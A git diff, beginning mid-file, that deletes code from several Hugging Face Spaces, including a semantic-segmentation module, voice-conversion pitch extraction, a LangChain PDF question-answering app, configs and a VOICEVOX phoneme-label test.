- material_offset = (len(self.segmodel.labeldata['object']) - 1
- ) * self.divmult
- if material_offset < classnum < material_offset + len(
- self.segmodel.labeldata['material']):
- return (
- pred['material'][:, classnum - material_offset],
- pred['material'].max(dim=1)[1] == classnum - material_offset)
- mask = None
- if classnum < len(self.segmodel.labeldata['object']):
- result = pred['object'][:, classnum]
- mask = (pred['object'].max(dim=1)[1] == classnum)
- # Some objects, like 'door', are also a part of other objects,
- # so add the part prediction also.
- for i, object_index in enumerate(self.objects_with_parts):
- local_index = (self.part_index[i] == classnum).nonzero()
- if len(local_index) == 0:
- continue
- local_index = local_index.item()
- # Ignore part predictions outside the mask. (We could pay
- # atttention to and penalize such predictions.)
- mask2 = (pred['object'].max(dim=1)[1] == object_index) * (
- part_pred[i].max(dim=1)[1] == local_index)
- if mask is None:
- mask = mask2
- else:
- mask = torch.max(mask, mask2)
- result = result + (part_pred[i][:, local_index])
- assert result is not 0, 'unrecognized class %d' % classnum
- return result, mask
-
- def expand_segment_quad(self, segs, segdiv='quad'):
- shape = segs.shape
- segs[:,3:] = segs[:,0:1] # start by copying the object channel
- num_seg_labels = self.num_object_classes
- # For every connected component present (using generator)
- for i, mask in component_masks(segs[:,0:1]):
- # Figure the bounding box of the label
- top, bottom = mask.any(dim=1).nonzero()[[0, -1], 0]
- left, right = mask.any(dim=0).nonzero()[[0, -1], 0]
- # Chop the bounding box into four parts
- vmid = (top + bottom + 1) // 2
- hmid = (left + right + 1) // 2
- # Construct top, bottom, right, left masks
- quad_mask = mask[None,:,:].repeat(4, 1, 1)
- quad_mask[0, vmid:, :] = 0 # top
- quad_mask[1, :, hmid:] = 0 # right
- quad_mask[2, :vmid, :] = 0 # bottom
- quad_mask[3, :, :hmid] = 0 # left
- quad_mask = quad_mask.long()
- # Modify extra segmentation labels by offsetting
- segs[i,3,:,:] += quad_mask[0] * num_seg_labels
- segs[i,4,:,:] += quad_mask[1] * (2 * num_seg_labels)
- segs[i,3,:,:] += quad_mask[2] * (3 * num_seg_labels)
- segs[i,4,:,:] += quad_mask[3] * (4 * num_seg_labels)
- # remove any components that were too small to subdivide
- mask = segs[:,3:] <= self.num_object_classes
- segs[:,3:][mask] = 0
- return segs
-
-class SemanticSegmenter(BaseSegmenter):
- def __init__(self, modeldir=None, segarch=None, segvocab=None,
- segsizes=None, segdiv=None, epoch=None):
- # Create a segmentation model
- if modeldir == None:
- modeldir = 'dataset/segmodel'
- if segvocab == None:
- segvocab = 'baseline'
- if segarch == None:
- segarch = ('resnet50_dilated8', 'ppm_bilinear_deepsup')
- if segdiv == None:
- segdiv = 'undivided'
- elif isinstance(segarch, str):
- segarch = segarch.split(',')
- segmodel = load_segmentation_model(modeldir, segarch, segvocab, epoch)
- if segsizes is None:
- segsizes = getattr(segmodel.meta, 'segsizes', [256])
- self.segsizes = segsizes
- # Verify segmentation model to has every out_channel labeled.
- assert len(segmodel.meta.labels) == list(c for c in segmodel.modules()
- if isinstance(c, torch.nn.Conv2d))[-1].out_channels
- segmodel.cuda()
- self.segmodel = segmodel
- self.segdiv = segdiv
- # Image normalization
- self.bgr = (segmodel.meta.imageformat.byteorder == 'BGR')
- self.imagemean = torch.tensor(segmodel.meta.imageformat.mean)
- self.imagestd = torch.tensor(segmodel.meta.imageformat.stdev)
- # Map from labels to external indexes, and labels to channel sets.
- self.labelmap = {'-': 0}
- self.channelmap = {'-': []}
- self.labels = [('-', '-')]
- num_labels = 1
- self.num_underlying_classes = len(segmodel.meta.labels)
- # labelmap maps names to external indexes.
- for i, label in enumerate(segmodel.meta.labels):
- if label.name not in self.channelmap:
- self.channelmap[label.name] = []
- self.channelmap[label.name].append(i)
- if getattr(label, 'internal', None) or label.name in self.labelmap:
- continue
- self.labelmap[label.name] = num_labels
- num_labels += 1
- self.labels.append((label.name, label.category))
- # Each category gets its own independent softmax.
- self.category_indexes = { category.name:
- [i for i, label in enumerate(segmodel.meta.labels)
- if label.category == category.name]
- for category in segmodel.meta.categories }
- # catindexmap maps names to category internal indexes
- self.catindexmap = {}
- for catname, indexlist in self.category_indexes.items():
- for index, i in enumerate(indexlist):
- self.catindexmap[segmodel.meta.labels[i].name] = (
- (catname, index))
- # After the softmax, each category is mapped to external indexes.
- self.category_map = { catname:
- torch.tensor([
- self.labelmap.get(segmodel.meta.labels[ind].name, 0)
- for ind in catindex])
- for catname, catindex in self.category_indexes.items()}
- self.category_rules = segmodel.meta.categories
- # Finally, naive subdivision can be applied.
- mult = 1
- if self.segdiv == 'quad':
- mult = 5
- suffixes = ['t', 'l', 'b', 'r']
- divided_labels = []
- for suffix in suffixes:
- divided_labels.extend([('%s-%s' % (label, suffix), cat)
- for label, cat in self.labels[1:]])
- self.channelmap.update({
- '%s-%s' % (label, suffix): self.channelmap[label]
- for label, cat in self.labels[1:] })
- self.labels.extend(divided_labels)
- # For examining a single class
- self.channellist = [self.channelmap[name] for name, _ in self.labels]
-
- def get_label_and_category_names(self, dataset=None):
- return self.labels, self.segmodel.categories
-
- def segment_batch(self, tensor_images, downsample=1):
- return self.raw_segment_batch(tensor_images, downsample)[0]
-
- def raw_segment_batch(self, tensor_images, downsample=1):
- pred = self.raw_seg_prediction(tensor_images, downsample)
- catsegs = {}
- for catkey, catindex in self.category_indexes.items():
- _, segs = torch.max(pred[:, catindex], dim=1)
- catsegs[catkey] = segs
- masks = {}
- segs = torch.zeros(len(tensor_images), len(self.category_rules),
- pred.shape[2], pred.shape[2], device=pred.device,
- dtype=torch.long)
- for i, cat in enumerate(self.category_rules):
- catmap = self.category_map[cat.name].to(pred.device)
- translated = catmap[catsegs[cat.name]]
- if getattr(cat, 'mask', None) is not None:
- if cat.mask not in masks:
- maskcat, maskind = self.catindexmap[cat.mask]
- masks[cat.mask] = (catsegs[maskcat] == maskind)
- translated *= masks[cat.mask].long()
- segs[:,i] = translated
- if self.segdiv == 'quad':
- segs = self.expand_segment_quad(segs,
- self.num_underlying_classes, self.segdiv)
- return segs, pred
-
- def raw_seg_prediction(self, tensor_images, downsample=1):
- '''
- Generates a segmentation by applying multiresolution voting on
- the segmentation model, using (rounded to 32 pixels) a set of
- resolutions in the example benchmark code.
- '''
- y, x = tensor_images.shape[2:]
- b = len(tensor_images)
- # Flip the RGB order if specified.
- if self.bgr:
- tensor_images = torch.flip(tensor_images, (1,))
- # Transform from our [-1..1] range to torch standard [0..1] range
- # and then apply normalization.
- tensor_images = ((tensor_images + 1) / 2
- ).sub_(self.imagemean[None,:,None,None].to(tensor_images.device)
- ).div_(self.imagestd[None,:,None,None].to(tensor_images.device))
- # Output shape can be downsampled.
- seg_shape = (y // downsample, x // downsample)
- # We want these to be multiples of 32 for the model.
- sizes = [(s, s) for s in self.segsizes]
- pred = torch.zeros(
- len(tensor_images), (self.num_underlying_classes),
- seg_shape[0], seg_shape[1]).cuda()
- for size in sizes:
- if size == tensor_images.shape[2:]:
- resized = tensor_images
- else:
- resized = torch.nn.AdaptiveAvgPool2d(size)(tensor_images)
- raw_pred = self.segmodel(
- dict(img_data=resized), segSize=seg_shape)
- softmax_pred = torch.empty_like(raw_pred)
- for catindex in self.category_indexes.values():
- softmax_pred[:, catindex] = torch.nn.functional.softmax(
- raw_pred[:, catindex], dim=1)
- pred += softmax_pred
- return pred
-
- def expand_segment_quad(self, segs, num_seg_labels, segdiv='quad'):
- shape = segs.shape
- output = segs.repeat(1, 3, 1, 1)
- # For every connected component present (using generator)
- for i, mask in component_masks(segs):
- # Figure the bounding box of the label
- top, bottom = mask.any(dim=1).nonzero()[[0, -1], 0]
- left, right = mask.any(dim=0).nonzero()[[0, -1], 0]
- # Chop the bounding box into four parts
- vmid = (top + bottom + 1) // 2
- hmid = (left + right + 1) // 2
- # Construct top, bottom, right, left masks
- quad_mask = mask[None,:,:].repeat(4, 1, 1)
- quad_mask[0, vmid:, :] = 0 # top
- quad_mask[1, :, hmid:] = 0 # right
- quad_mask[2, :vmid, :] = 0 # bottom
- quad_mask[3, :, :hmid] = 0 # left
- quad_mask = quad_mask.long()
- # Modify extra segmentation labels by offsetting
- output[i,1,:,:] += quad_mask[0] * num_seg_labels
- output[i,2,:,:] += quad_mask[1] * (2 * num_seg_labels)
- output[i,1,:,:] += quad_mask[2] * (3 * num_seg_labels)
- output[i,2,:,:] += quad_mask[3] * (4 * num_seg_labels)
- return output
-
- def predict_single_class(self, tensor_images, classnum, downsample=1):
- '''
- Given a batch of images (RGB, normalized to [-1...1]) and
- a specific segmentation class number, returns a tuple with
- (1) a differentiable ([0..1]) prediction score for the class
- at every pixel of the input image.
- (2) a binary mask showing where in the input image the
- specified class is the best-predicted label for the pixel.
- Does not work on subdivided labels.
- '''
- seg, pred = self.raw_segment_batch(tensor_images,
- downsample=downsample)
- result = pred[:,self.channellist[classnum]].sum(dim=1)
- mask = (seg == classnum).max(1)[0]
- return result, mask
-
-def component_masks(segmentation_batch):
- '''
- Splits connected components into regions (slower, requires cpu).
- '''
- npbatch = segmentation_batch.cpu().numpy()
- for i in range(segmentation_batch.shape[0]):
- labeled, num = skimage.morphology.label(npbatch[i][0], return_num=True)
- labeled = torch.from_numpy(labeled).to(segmentation_batch.device)
- for label in range(1, num):
- yield i, (labeled == label)
-
-def load_unified_parsing_segmentation_model(segmodel_arch, segvocab, epoch):
- segmodel_dir = 'dataset/segmodel/%s-%s-%s' % ((segvocab,) + segmodel_arch)
- # Load json of class names and part/object structure
- with open(os.path.join(segmodel_dir, 'labels.json')) as f:
- labeldata = json.load(f)
- nr_classes={k: len(labeldata[k])
- for k in ['object', 'scene', 'material']}
- nr_classes['part'] = sum(len(p) for p in labeldata['object_part'].values())
- # Create a segmentation model
- segbuilder = upsegmodel.ModelBuilder()
- # example segmodel_arch = ('resnet101', 'upernet')
- seg_encoder = segbuilder.build_encoder(
- arch=segmodel_arch[0],
- fc_dim=2048,
- weights=os.path.join(segmodel_dir, 'encoder_epoch_%d.pth' % epoch))
- seg_decoder = segbuilder.build_decoder(
- arch=segmodel_arch[1],
- fc_dim=2048, use_softmax=True,
- nr_classes=nr_classes,
- weights=os.path.join(segmodel_dir, 'decoder_epoch_%d.pth' % epoch))
- segmodel = upsegmodel.SegmentationModule(
- seg_encoder, seg_decoder, labeldata)
- segmodel.categories = ['object', 'part', 'material']
- segmodel.eval()
- return segmodel
-
-def load_segmentation_model(modeldir, segmodel_arch, segvocab, epoch=None):
- # Load csv of class names
- segmodel_dir = 'dataset/segmodel/%s-%s-%s' % ((segvocab,) + segmodel_arch)
- with open(os.path.join(segmodel_dir, 'labels.json')) as f:
- labeldata = EasyDict(json.load(f))
- # Automatically pick the last epoch available.
- if epoch is None:
- choices = [os.path.basename(n)[14:-4] for n in
- glob.glob(os.path.join(segmodel_dir, 'encoder_epoch_*.pth'))]
- epoch = max([int(c) for c in choices if c.isdigit()])
- # Create a segmentation model
- segbuilder = segmodel_module.ModelBuilder()
- # example segmodel_arch = ('resnet101', 'upernet')
- seg_encoder = segbuilder.build_encoder(
- arch=segmodel_arch[0],
- fc_dim=2048,
- weights=os.path.join(segmodel_dir, 'encoder_epoch_%d.pth' % epoch))
- seg_decoder = segbuilder.build_decoder(
- arch=segmodel_arch[1],
- fc_dim=2048, inference=True, num_class=len(labeldata.labels),
- weights=os.path.join(segmodel_dir, 'decoder_epoch_%d.pth' % epoch))
- segmodel = segmodel_module.SegmentationModule(seg_encoder, seg_decoder,
- torch.nn.NLLLoss(ignore_index=-1))
- segmodel.categories = [cat.name for cat in labeldata.categories]
- segmodel.labels = [label.name for label in labeldata.labels]
- categories = OrderedDict()
- label_category = numpy.zeros(len(segmodel.labels), dtype=int)
- for i, label in enumerate(labeldata.labels):
- label_category[i] = segmodel.categories.index(label.category)
- segmodel.meta = labeldata
- segmodel.eval()
- return segmodel
-
-def ensure_upp_segmenter_downloaded(directory):
- baseurl = 'http://netdissect.csail.mit.edu/data/segmodel'
- dirname = 'upp-resnet50-upernet'
- files = ['decoder_epoch_40.pth', 'encoder_epoch_40.pth', 'labels.json']
- download_dir = os.path.join(directory, dirname)
- os.makedirs(download_dir, exist_ok=True)
- for fn in files:
- if os.path.isfile(os.path.join(download_dir, fn)):
- continue # Skip files already downloaded
- url = '%s/%s/%s' % (baseurl, dirname, fn)
- print('Downloading %s' % url)
- urlretrieve(url, os.path.join(download_dir, fn))
- assert os.path.isfile(os.path.join(directory, dirname, 'labels.json'))
-
-def test_main():
- '''
- Test the unified segmenter.
- '''
- from PIL import Image
- testim = Image.open('script/testdata/test_church_242.jpg')
- tensor_im = (torch.from_numpy(numpy.asarray(testim)).permute(2, 0, 1)
- .float() / 255 * 2 - 1)[None, :, :, :].cuda()
- segmenter = UnifiedParsingSegmenter()
- seg = segmenter.segment_batch(tensor_im)
- bc = torch.bincount(seg.view(-1))
- labels, cats = segmenter.get_label_and_category_names()
- for label in bc.nonzero()[:,0]:
- if label.item():
- # What is the prediction for this class?
- pred, mask = segmenter.predict_single_class(tensor_im, label.item())
- assert mask.sum().item() == bc[label].item()
- assert len(((seg == label).max(1)[0] - mask).nonzero()) == 0
- inside_pred = pred[mask].mean().item()
- outside_pred = pred[~mask].mean().item()
- print('%s (%s, #%d): %d pixels, pred %.2g inside %.2g outside' %
- (labels[label.item()] + (label.item(), bc[label].item(),
- inside_pred, outside_pred)))
-
-if __name__ == '__main__':
- test_main()
diff --git a/spaces/Dragonnext/scylla-proxy/README.md b/spaces/Dragonnext/scylla-proxy/README.md
deleted file mode 100644
index ac6dcd2d2cefb29aa31c7c7dbcde8083c19272ab..0000000000000000000000000000000000000000
--- a/spaces/Dragonnext/scylla-proxy/README.md
+++ /dev/null
@@ -1,10 +0,0 @@
----
-title: Scylla OAI Proxy
-emoji: 🐙
-colorFrom: purple
-colorTo: gray
-sdk: docker
-pinned: false
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/Eddycrack864/Applio-Inference/infer/modules/train/extract/extract_f0_rmvpe.py b/spaces/Eddycrack864/Applio-Inference/infer/modules/train/extract/extract_f0_rmvpe.py
deleted file mode 100644
index c6c90440d9e612b37c6d5a514786a6d0fffb19ba..0000000000000000000000000000000000000000
--- a/spaces/Eddycrack864/Applio-Inference/infer/modules/train/extract/extract_f0_rmvpe.py
+++ /dev/null
@@ -1,141 +0,0 @@
-import os
-import sys
-import traceback
-
-import parselmouth
-
-now_dir = os.getcwd()
-sys.path.append(now_dir)
-import logging
-
-import numpy as np
-import pyworld
-
-from infer.lib.audio import load_audio
-
-logging.getLogger("numba").setLevel(logging.WARNING)
-
-n_part = int(sys.argv[1])
-i_part = int(sys.argv[2])
-i_gpu = sys.argv[3]
-os.environ["CUDA_VISIBLE_DEVICES"] = str(i_gpu)
-exp_dir = sys.argv[4]
-is_half = sys.argv[5]
-f = open("%s/extract_f0_feature.log" % exp_dir, "a+")
-
-
-def printt(strr):
- print(strr)
- f.write("%s\n" % strr)
- f.flush()
-
-
-class FeatureInput(object):
- def __init__(self, samplerate=16000, hop_size=160):
- self.fs = samplerate
- self.hop = hop_size
-
- self.f0_bin = 256
- self.f0_max = 1100.0
- self.f0_min = 50.0
- self.f0_mel_min = 1127 * np.log(1 + self.f0_min / 700)
- self.f0_mel_max = 1127 * np.log(1 + self.f0_max / 700)
-
- def compute_f0(self, path, f0_method):
- x = load_audio(path, self.fs)
- # p_len = x.shape[0] // self.hop
- if f0_method == "rmvpe":
- if hasattr(self, "model_rmvpe") == False:
- from infer.lib.rmvpe import RMVPE
-
- print("Loading rmvpe model")
- self.model_rmvpe = RMVPE(
- "assets/rmvpe/rmvpe.pt", is_half=is_half, device="cuda"
- )
- f0 = self.model_rmvpe.infer_from_audio(x, thred=0.03)
- return f0
-
- def coarse_f0(self, f0):
- f0_mel = 1127 * np.log(1 + f0 / 700)
- f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - self.f0_mel_min) * (
- self.f0_bin - 2
- ) / (self.f0_mel_max - self.f0_mel_min) + 1
-
- # use 0 or 1
- f0_mel[f0_mel <= 1] = 1
- f0_mel[f0_mel > self.f0_bin - 1] = self.f0_bin - 1
- f0_coarse = np.rint(f0_mel).astype(int)
- assert f0_coarse.max() <= 255 and f0_coarse.min() >= 1, (
- f0_coarse.max(),
- f0_coarse.min(),
- )
- return f0_coarse
-
- def go(self, paths, f0_method):
- if len(paths) == 0:
- printt("no-f0-todo")
- else:
- printt("todo-f0-%s" % len(paths))
- n = max(len(paths) // 5, 1) # 每个进程最多打印5条
- for idx, (inp_path, opt_path1, opt_path2) in enumerate(paths):
- try:
- if idx % n == 0:
- printt("f0ing,now-%s,all-%s,-%s" % (idx, len(paths), inp_path))
- if (
- os.path.exists(opt_path1 + ".npy") == True
- and os.path.exists(opt_path2 + ".npy") == True
- ):
- continue
- featur_pit = self.compute_f0(inp_path, f0_method)
- np.save(
- opt_path2,
- featur_pit,
- allow_pickle=False,
- ) # nsf
- coarse_pit = self.coarse_f0(featur_pit)
- np.save(
- opt_path1,
- coarse_pit,
- allow_pickle=False,
- ) # ori
- except:
- printt("f0fail-%s-%s-%s" % (idx, inp_path, traceback.format_exc()))
-
-
-if __name__ == "__main__":
- # exp_dir=r"E:\codes\py39\dataset\mi-test"
- # n_p=16
- # f = open("%s/log_extract_f0.log"%exp_dir, "w")
- printt(sys.argv)
- featureInput = FeatureInput()
- paths = []
- inp_root = "%s/1_16k_wavs" % (exp_dir)
- opt_root1 = "%s/2a_f0" % (exp_dir)
- opt_root2 = "%s/2b-f0nsf" % (exp_dir)
-
- os.makedirs(opt_root1, exist_ok=True)
- os.makedirs(opt_root2, exist_ok=True)
- for name in sorted(list(os.listdir(inp_root))):
- inp_path = "%s/%s" % (inp_root, name)
- if "spec" in inp_path:
- continue
- opt_path1 = "%s/%s" % (opt_root1, name)
- opt_path2 = "%s/%s" % (opt_root2, name)
- paths.append([inp_path, opt_path1, opt_path2])
- try:
- featureInput.go(paths[i_part::n_part], "rmvpe")
- except:
- printt("f0_all_fail-%s" % (traceback.format_exc()))
- # ps = []
- # for i in range(n_p):
- # p = Process(
- # target=featureInput.go,
- # args=(
- # paths[i::n_p],
- # f0method,
- # ),
- # )
- # ps.append(p)
- # p.start()
- # for i in range(n_p):
- # ps[i].join()
diff --git a/spaces/Endre/SemanticSearch-HU/src/exploration/mqa_test.py b/spaces/Endre/SemanticSearch-HU/src/exploration/mqa_test.py
deleted file mode 100644
index 005fb0a51e420f8e79ee44803dbf2234a0290890..0000000000000000000000000000000000000000
--- a/spaces/Endre/SemanticSearch-HU/src/exploration/mqa_test.py
+++ /dev/null
@@ -1,9 +0,0 @@
-from datasets import load_dataset
-
-faq_hu = load_dataset("clips/mqa", scope="faq", language="hu")
-cqa_hu = load_dataset("clips/mqa", scope="cqa", language="hu")
-
-print(faq_hu)
-print(cqa_hu)
-print(faq_hu['train'][:5])
-print(cqa_hu['train'][:5])
\ No newline at end of file
diff --git a/spaces/EronSamez/RVC_HFmeu/colab_for_mdx.py b/spaces/EronSamez/RVC_HFmeu/colab_for_mdx.py
deleted file mode 100644
index 274846d0b5395865a05fce0da86b96d26ac06999..0000000000000000000000000000000000000000
--- a/spaces/EronSamez/RVC_HFmeu/colab_for_mdx.py
+++ /dev/null
@@ -1,71 +0,0 @@
-import json
-import os
-import gc
-import psutil
-import requests
-import subprocess
-import time
-import logging
-import sys
-import shutil
-now_dir = os.getcwd()
-sys.path.append(now_dir)
-first_cell_executed = False
-file_folder = "Colab-for-MDX_B"
-def first_cell_ran():
- global first_cell_executed
- if first_cell_executed:
- #print("The 'first_cell_ran' function has already been executed.")
- return
-
-
-
- first_cell_executed = True
- os.makedirs("tmp_models", exist_ok=True)
-
-
-
- class hide_opt: # hide outputs
- def __enter__(self):
- self._original_stdout = sys.stdout
- sys.stdout = open(os.devnull, "w")
-
- def __exit__(self, exc_type, exc_val, exc_tb):
- sys.stdout.close()
- sys.stdout = self._original_stdout
-
- def get_size(bytes, suffix="B"): # read ram
- global svmem
- factor = 1024
- for unit in ["", "K", "M", "G", "T", "P"]:
- if bytes < factor:
- return f"{bytes:.2f}{unit}{suffix}"
- bytes /= factor
- svmem = psutil.virtual_memory()
-
-
- def use_uvr_without_saving():
- print("Notice: files won't be saved to personal drive.")
- print(f"Downloading {file_folder}...", end=" ")
- with hide_opt():
- #os.chdir(mounting_path)
- items_to_move = ["demucs", "diffq","julius","model","separated","tracks","mdx.py","MDX-Net_Colab.ipynb"]
- subprocess.run(["git", "clone", "https://github.com/NaJeongMo/Colab-for-MDX_B.git"])
- for item_name in items_to_move:
- item_path = os.path.join(file_folder, item_name)
- if os.path.exists(item_path):
- if os.path.isfile(item_path):
- shutil.move(item_path, now_dir)
- elif os.path.isdir(item_path):
- shutil.move(item_path, now_dir)
- try:
- shutil.rmtree(file_folder)
- except PermissionError:
- print(f"No se pudo eliminar la carpeta {file_folder}. Puede estar relacionada con Git.")
-
-
- use_uvr_without_saving()
- print("done!")
- if not os.path.exists("tracks"):
- os.mkdir("tracks")
-first_cell_ran()
\ No newline at end of file
diff --git a/spaces/EuroPython2022/mmocr-demo/configs/_base_/schedules/schedule_adadelta_18e.py b/spaces/EuroPython2022/mmocr-demo/configs/_base_/schedules/schedule_adadelta_18e.py
deleted file mode 100644
index 33f7960c51bf7d0f2b5bc03e8707a85a01e000fd..0000000000000000000000000000000000000000
--- a/spaces/EuroPython2022/mmocr-demo/configs/_base_/schedules/schedule_adadelta_18e.py
+++ /dev/null
@@ -1,8 +0,0 @@
-# optimizer
-optimizer = dict(type='Adadelta', lr=0.5)
-optimizer_config = dict(grad_clip=dict(max_norm=0.5))
-# learning policy
-lr_config = dict(policy='step', step=[8, 14, 16])
-# running settings
-runner = dict(type='EpochBasedRunner', max_epochs=18)
-checkpoint_config = dict(interval=1)
diff --git a/spaces/FacundoSander/PdfQA/main.py b/spaces/FacundoSander/PdfQA/main.py
deleted file mode 100644
index e2a357414f8fd841a9957f891cae03f30ccfa621..0000000000000000000000000000000000000000
--- a/spaces/FacundoSander/PdfQA/main.py
+++ /dev/null
@@ -1,53 +0,0 @@
-from langchain.chains import RetrievalQA
-from langchain.llms import OpenAI
-from langchain.document_loaders import PyPDFLoader
-from langchain.text_splitter import CharacterTextSplitter
-from langchain.embeddings import OpenAIEmbeddings
-from langchain.vectorstores import Chroma
-from fastapi import FastAPI
-from fastapi.staticfiles import StaticFiles
-
-app = FastAPI()
-
-app.mount("/static", StaticFiles(directory="static"), name="static")
-
-def create_qa_object(file, chain_type, k):
- # load document
- loader = PyPDFLoader(file)
- documents = loader.load()
-
- # split the documents into chunks
- text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
- texts = text_splitter.split_documents(documents)
-
- # select which embeddings we want to use
- embeddings = OpenAIEmbeddings()
-
- # create the vectorestore to use as the index
- db = Chroma.from_documents(texts, embeddings)
-
- # expose this index in a retriever interface
- retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": k})
-
- # create a chain to answer questions
- qa = RetrievalQA.from_chain_type(
- llm=OpenAI(), chain_type=chain_type, retriever=retriever, return_source_documents=True)
-
- return qa
-
-def get_answer(qa, query):
- result = qa({"query": query})
- return result["result"]
-
-def get_source_documents(qa, query):
- result = qa({"query": query})
- source_documents = result["source_documents"]
- source_info = []
- for doc in source_documents:
- source_info.append(f"{doc.page_content[:700]}...")
- source_text = " | ".join(source_info)
- return source_text
-
-if __name__ == "__main__":
- import uvicorn
- uvicorn.run("api:app", host="0.0.0.0", port=8000, reload=True)
diff --git a/spaces/GXSA/bingo/src/app/page.tsx b/spaces/GXSA/bingo/src/app/page.tsx
deleted file mode 100644
index 0dff3431b098ce4fe282cc83fc87a93a28a43090..0000000000000000000000000000000000000000
--- a/spaces/GXSA/bingo/src/app/page.tsx
+++ /dev/null
@@ -1,15 +0,0 @@
-import dynamic from 'next/dynamic'
-
-const DynamicComponentWithNoSSR = dynamic(
- () => import('../components/chat'),
- { ssr: false }
-)
-
-export default function IndexPage() {
- return (
- <>
-
-
- >
- )
-}
diff --git a/spaces/GaenKoki/voicevox/test/test_full_context_label.py b/spaces/GaenKoki/voicevox/test/test_full_context_label.py
deleted file mode 100644
index 7cdde34f4644ccf7b3048d707f99b0171e25114e..0000000000000000000000000000000000000000
--- a/spaces/GaenKoki/voicevox/test/test_full_context_label.py
+++ /dev/null
@@ -1,404 +0,0 @@
-from copy import deepcopy
-from itertools import chain
-from unittest import TestCase
-
-from voicevox_engine.full_context_label import (
- AccentPhrase,
- BreathGroup,
- Mora,
- Phoneme,
- Utterance,
-)
-
-
-class TestBasePhonemes(TestCase):
- def setUp(self):
- super().setUp()
- # pyopenjtalk.extract_fullcontext("こんにちは、ヒホです。")の結果
- # 出来る限りテスト内で他のライブラリに依存しないため、
- # またテスト内容を透明化するために、テストケースを生成している
- self.test_case_hello_hiho = [
- # sil (無音)
- "xx^xx-sil+k=o/A:xx+xx+xx/B:xx-xx_xx/C:xx_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:xx_xx#xx_xx@xx_xx|xx_xx/G:5_5%0_xx_xx/H:xx_xx/I:xx-xx"
- + "@xx+xx&xx-xx|xx+xx/J:1_5/K:2+2-9",
- # k
- "xx^sil-k+o=N/A:-4+1+5/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # o
- "sil^k-o+N=n/A:-4+1+5/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # N (ん)
- "k^o-N+n=i/A:-3+2+4/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # n
- "o^N-n+i=ch/A:-2+3+3/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # i
- "N^n-i+ch=i/A:-2+3+3/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # ch
- "n^i-ch+i=w/A:-1+4+2/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # i
- "i^ch-i+w=a/A:-1+4+2/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # w
- "ch^i-w+a=pau/A:0+5+1/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # a
- "i^w-a+pau=h/A:0+5+1/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # pau (読点)
- "w^a-pau+h=i/A:xx+xx+xx/B:09-xx_xx/C:xx_xx+xx/D:09+xx_xx/E:5_5!0_xx-xx"
- + "/F:xx_xx#xx_xx@xx_xx|xx_xx/G:4_1%0_xx_xx/H:1_5/I:xx-xx"
- + "@xx+xx&xx-xx|xx+xx/J:1_4/K:2+2-9",
- # h
- "a^pau-h+i=h/A:0+1+4/B:09-xx_xx/C:09_xx+xx/D:22+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # i
- "pau^h-i+h=o/A:0+1+4/B:09-xx_xx/C:09_xx+xx/D:22+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # h
- "h^i-h+o=d/A:1+2+3/B:09-xx_xx/C:22_xx+xx/D:10+7_2/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # o
- "i^h-o+d=e/A:1+2+3/B:09-xx_xx/C:22_xx+xx/D:10+7_2/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # d
- "h^o-d+e=s/A:2+3+2/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
